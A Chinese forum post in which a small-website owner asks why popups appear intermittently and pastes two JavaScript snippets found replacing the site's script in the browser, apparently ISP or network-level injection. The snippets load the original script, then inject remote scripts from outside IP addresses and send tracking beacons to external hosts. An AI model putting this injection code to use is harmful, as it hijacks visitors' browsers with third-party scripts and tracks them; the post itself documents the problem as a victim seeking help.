一个小站,本身未加弹窗,结果打开时弹出一个弹窗,然后刷新没有了,过段时间再打开又有弹窗,查看源代码,发现里面的js被篡改。但是上服务器上打开js查看又是正常的。基本排除网站程序的问题,网上搜索的结果一般认为是电信强加广告,但是我访问其他站一次也没出现过,独访问这个站才有弹窗。也有认为是arp攻击。求大神解答,这问题搞得好头疼。附js代码如下: var _objparam_51_ = new Object;
_objparam_51_.p = 1365966787;
_objparam_51_.aid = 49;
_objparam_51_.stat = 'http://76.73.85.179/stat/img.php?p='+_objparam_51_.p+'&aid='+_objparam_51_.aid+'&acid=1&area=440600&uid=31633&ucid=73';
_objparam_51_.otherstat = 'http://76.73.85.179/stat/otherstat.php?type=2&aid='+_objparam_51_.aid;
_objparam_51_.expires = 10;
_objparam_51_.oldurl = 'http://小站域名.com/js/bot2.js?p=1';
_objparam_51_.url = 'http://www.lftyx.com/a195338.php?W2Ce78=2&p=1365966787&c=1900483101';
window.setTimeout(function(){var a=document.createElement("script");a.src=_objparam_51_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
window.setTimeout(function(){var a=document.createElement("script");a.src="http://76.73.85.179/js/utils51.js";document.getElementsByTagName("head")[0].appendChild(a);},0);
<!--
还有一个 var _objparam_51_ = new Object;
_objparam_51_.p = 1365972238;
_objparam_51_.aid = 45;
_objparam_51_.stat = 'http://67.159.44.187/stat/img.php?p='+_objparam_51_.p+'&aid='+_objparam_51_.aid+'&acid=1&area=440600&uid=31633&ucid=73';
_objparam_51_.otherstat = 'http://67.159.44.187/stat/otherstat.php?type=2&aid='+_objparam_51_.aid;
_objparam_51_.expires = 10;
_objparam_51_.oldurl = 'http://小站域名.com/js/xp.js?p=1';
_objparam_51_.url = 'http://www.51zhenxin.info/a195338.php?W2Ce78=1&p=1365972238&c=1900483101';
window.setTimeout(function(){var a=document.createElement("script");a.src=_objparam_51_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
window.setTimeout(function(){var a=document.createElement("script");a.src="http://67.159.44.187/js/utils51.js";document.getElementsByTagName("head")[0].appendChild(a);},0);
<!--
小站域名,我就省略了。
不知是否有朋友遇到过?盼解答,为谢。 |